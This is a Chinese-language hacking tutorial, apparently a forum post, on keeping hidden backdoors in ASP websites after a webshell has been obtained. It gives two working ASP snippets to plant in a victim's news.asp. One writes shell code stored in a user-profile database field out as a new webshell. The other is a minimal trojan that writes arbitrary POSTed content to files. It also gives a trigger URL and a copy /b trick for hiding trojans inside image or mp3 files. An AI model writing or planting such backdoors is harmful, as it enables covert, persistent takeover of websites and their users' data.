巧用.mdb后綴數(shù)據(jù)庫做后門的代碼

 我不否認(rèn)n早前的那個把a(bǔ)sp木馬寫到圖片文件中不失為一種好的方法，其實(shí)不僅可以寫到圖片啦 寫到mp3文件里寫到doc文件里都是可以的啦
copy 文件名/參數(shù) + 文件名/參數(shù) 生成文件名
這樣的方法可以很靈活的運(yùn)用來達(dá)到隱藏文件的目的，具體的參數(shù)就是/a以acsic碼方式，/b二進(jìn)制方式，就不羅嗦這些了，至于如何上傳webshell,什么是webshell也不屬于本文的討論范圍。今天要講的是如何把后門放到后綴。mdb的數(shù)據(jù)庫中，前提是在我們拿到
一個webshell之后…
我們所知道的，很多站點(diǎn)在用戶注冊的時候要讓填好多東西例如：
用戶名、密碼、qq、郵箱、個人簡介、電話、聯(lián)系方式、住址一類的
而對應(yīng)到數(shù)據(jù)庫中也都會有相應(yīng)的表 字段 值
我今天要做的就是 我注冊一個用戶在 我的個人簡介的地方上寫入shell代碼，然后修改他站點(diǎn)上的一個文件，使用的時候觸發(fā)這個文件，就把我個人簡歷中的shell代碼，備份到當(dāng)前目錄下
廢話少說了 大家看代碼
<%
if request（“action”）=“firefox” then
fname=request.querystring（“fn”）
tname=request.querystring（“tn”）
bname=request.querystring（“bn”）
id=request.querystring（“id”）
idvalue=request.querystring（“idv”）
set rs=server.createobject（“ADODB.recordset”）
sql=“select ”& bname & “ from ”&tname& “ where ”&id&“=”&idvalue&“”“”
rs.open sql,conn,1,3
if not rs.eof then
content=rs（bname）
else
response.write “Nothing”
end if
set fso=Server.CreateObject（“Scripting.FileSystemObject”）
set txtfile=fso.createtextfile（server.mappath（fname））
txtfile.writeline（content）
txtfile.close
end if
%>
將上邊的代碼加到站點(diǎn)的一個文件中 如news.asp
根據(jù)我們了解的信息 在其站點(diǎn)注冊后 下載數(shù)據(jù)庫看結(jié)構(gòu)
我注冊的firefox名字是在 user表 其id值為119 用于存放我注冊簡歷的表字段為jl
那么在使用的時候我們
news.asp?action=firefox&fn=firefox.asp&tn=user&bn=jl&id=id&idv=119
就可以在news.asp相同目錄下寫入一個名為 firefox.asp的webshell
以上可以說是萬千隱藏方法中的一種 下邊再說另外一種更方便的隱藏方法
這個方法就和mdb后綴無關(guān)系了
同樣我們還是修改news.asp 將以下代碼插入到對方news.asp中
<%
if request（“action”）=“firefox” then
n=request.form（“n”）
c=request.form（“c”）
set fso=Server.CreateObject（“Scripting.FileSystemObject”）
set txtfile=fso.createtextfile（server.mappath（n））
txtfile.writeline（c）
txtfile.close
end if
%>
這段代碼相對簡單些 算是一個木馬的服務(wù)端吧。引言：好長時間了，從剛開始的站點(diǎn)管理器到現(xiàn)在流行的幾款asp后門，相信大多網(wǎng)管都能說出這些經(jīng)典webshell的名字，如海洋、老兵、藍(lán)屏等，也相信大多數(shù)的網(wǎng)管學(xué)會了關(guān)鍵字的搜索方法來搜索這些木馬，當(dāng)然現(xiàn)在的時間如果再象隱藏后門就要講些技巧啦，俗話說的好“佛高一尺，我高一丈”。